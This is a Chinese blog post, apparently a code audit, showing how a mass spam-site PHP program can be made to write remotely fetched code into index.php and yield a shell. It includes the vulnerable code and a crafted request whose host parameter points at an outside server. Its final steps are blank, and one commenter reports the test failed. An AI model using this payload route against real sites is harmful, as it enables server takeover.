泛站群漏洞可Getshell

3 从上面看出,$sprocket_wheel_links变量可控,用strCut函数处理,来跟踪下strCut函数 [php]function strCut($strContent,$StartStr,$EndStr,$CutType=2) { $s1=0; $s2=0; $cutStr = ""; switch($CutType) { case 1: $s1 = strpos($strContent, $StartStr); if ($s1 === false) $s1 = 0; $s2 = strpos($strContent, $EndStr, $s1) + strlen($EndStr); break; case 2: $s1 = strpos($strContent, $StartStr); if ($s1 === false) $s1 = 0; else $s1 += strlen($StartStr); $s2 = strpos($strContent, $EndStr, $s1); break; } $cutStr = substr($strContent, $s1, $s2-$s1); return $cutStr; }[/php] 简单的截取字符串,并无特殊过滤 但是所有生成的文件名都是以.txt结尾的,所以放弃了 于是看/pic/index.php [php]for ($i=0;$i < count($Branch_directory); $i++) { $check = CFolder("./".$Branch_directory[$i]."/"); if ($check == 1) { WriteIn("./".$Branch_directory[$i]."/index.php",$NewFile_content); } } WriteIn("./index.php",$Content_mb); chmod("index.php",0777); echo ""; exit();} else { $Content_mb=GetHtml($Remote_server."/index.php?type=index.php&host=".$host_name); WriteIn("./index.php",$Content_mb); chmod("index.php",0777); header("Location: index.php"); exit();} [/php] 找到代码:WriteIn("./index.php",$Content_mb); 看是是以php结尾,内容是$Content_mb 继续看$Content_mb [php]$Content_mb=GetHtml($Remote_server."/index.php?type=index.php&host=".$host_name);[/php] 获取了之前的index.php并传入host 于是想到在[php]$Remote_server."/index.php?type=index.php&host=".$host_name[/php]里面有php代码就OK 于是构造 [php]http://localhost/fanzhan/?host=http://baidu.com/[/php] 4 5

3 条评论

  1. 456

    这个是哪个站群的? 龙少的那个?

  2. 123

    测试不成功

    1. 小菜
      @123

      是那个站群啊?

发表评论